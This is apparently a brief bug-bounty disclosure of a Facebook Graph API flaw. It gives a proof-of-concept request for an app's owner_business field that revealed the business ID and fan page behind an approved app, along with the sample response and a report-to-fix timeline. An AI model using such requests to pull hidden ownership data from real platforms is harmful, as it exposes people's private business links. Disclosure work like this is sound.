[Facebook] Disclose App associated Business and Fan Page

 By making a restricted API call, a malicious user could have identified the Business and the Fan Page of an approved Facebook App.

POC -

An API call made as -

https://developers.facebook.com/tools/explorer/?method=GET&path=APP_ID?fields= owner_business{link}&version=v10.0

will respond with -

{"owner_business":{"link":"https:\/\/www.facebook.com\/FAN_PAGE_ID","id":"BUSINESS_ID"},"id":"APP_ID",

Timeline -

Reported - Tuesday, May 25, 2021

Marked as Duplicate - Wednesday, May 26, 2021 

Fixed - Wednesday, July 13, 2022